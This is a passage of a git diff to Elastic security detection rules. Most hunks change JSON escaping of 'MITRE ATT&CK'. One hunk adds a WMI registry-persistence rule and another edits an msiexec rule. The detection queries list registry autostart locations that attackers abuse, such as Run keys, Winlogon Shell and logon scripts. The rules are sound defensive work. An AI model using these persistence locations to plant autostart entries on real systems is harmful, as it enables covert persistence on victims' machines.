Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json index c7a570ea83b..e01a087b321 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json index 89e00fe2a4e..adcb0c7b59d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json index dea0cc3da4e..cd73bf1e993 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json index 5bd81b5630b..1357506f143 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_105.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json index 70d6da31e81..932708f800a 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json index 16f9c2d14c0..5a6a3a22ca2 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json index 0b16eed1aa3..7dd2ea1bdf5 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json b/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json index 698f703cefa..2b70e6e7a96 100644 --- a/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Execution via MSIEXEC", - "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n process.name : \"msiexec.exe\" and user.id : (\"S-1-5-21*\", \"S-1-12-*\") and process.parent.executable != null and\n (\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.args : (\"?:\\\\Users\\\\*\", \"?:\\\\ProgramData\\\\*\") and\n not process.parent.executable : (\"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Users\\\\*\\\\Desktop\\\\*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\programdata\\\\*\")) or\n\n (process.args_count == 1 and not process.parent.executable : (\"?:\\\\Windows\\\\explorer.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\explorer.exe\")) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n (process.parent.args : \"Schedule\" or process.parent.name : \"wmiprvse.exe\" or\n process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\*\" or\n (process.parent.name : (\"powershell.exe\", \"cmd.exe\") and length(process.parent.command_line) \u003e= 200))) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.working_directory : \"?:\\\\\" and process.parent.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* noisy pattern */\n not (process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\" and process.parent.args_count \u003e= 2 and\n process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\*.msi\") and\n\n not process.args : (\"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Program Files\\\\*\")\n", + "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n process.name : \"msiexec.exe\" and user.id : (\"S-1-5-21*\", \"S-1-12-*\") and process.parent.executable != null and\n (\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.args : (\"?:\\\\Users\\\\*\", \"?:\\\\ProgramData\\\\*\") and\n not process.parent.executable : (\"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Users\\\\*\\\\Desktop\\\\*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\programdata\\\\*\")) or\n\n (process.args_count == 1 and not process.parent.executable : (\"?:\\\\Windows\\\\explorer.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\explorer.exe\")) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n (process.parent.args : \"Schedule\" or process.parent.name : \"wmiprvse.exe\" or\n process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\*\" or\n (process.parent.name : (\"powershell.exe\", \"cmd.exe\") and length(process.parent.command_line) >= 200))) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.working_directory : \"?:\\\\\" and process.parent.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* noisy pattern */\n not (process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\" and process.parent.args_count >= 2 and\n process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\*.msi\") and\n\n not process.args : (\"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Program Files\\\\*\")\n", "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/" @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json index c166aa23740..6846c9a0fef 100644 --- a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json index 78f621b9332..2173d737bf1 100644 --- a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json index ba2a53a2dbd..0c0f9bf85ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106.json new file mode 100644 index 00000000000..64a5a55252f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Standard Registry Provider", + "note": "## Triage and analysis\n\n### Investigating Persistence via WMI Standard Registry Provider\n\nThe Windows Management Instrumentation (WMI) StdRegProv is a registry provider that allows users to manage registry keys and values on Windows systems. Adversaries may abuse this functionality to modify registry locations commonly used for persistence, enabling them to maintain unauthorized access to a system.\n\nThis rule identifies instances where the WMI StdRegProv is used to modify specific registry paths associated with persistence mechanisms.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify which process triggered this behavior.\n- Verify whether the file specified in the run key is signed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Examine the file specified in the run key using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.data.strings != null and process.name : \"WmiPrvSe.exe\" and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\"\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json index 0a51755fd7d..fbe66dba682 100644 --- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json +++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json index caf5e3ba335..de641f291ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json +++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json index 3e626ddb3c0..16f047a5552 100644 --- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json +++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json index 3a09a6545ef..57c3009a315 100644 --- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json +++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json index 71a4de66253..e47c5956023 100644 --- a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json +++ b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json index 44d216a2aa4..51a01157a60 100644 --- a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json +++ b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": 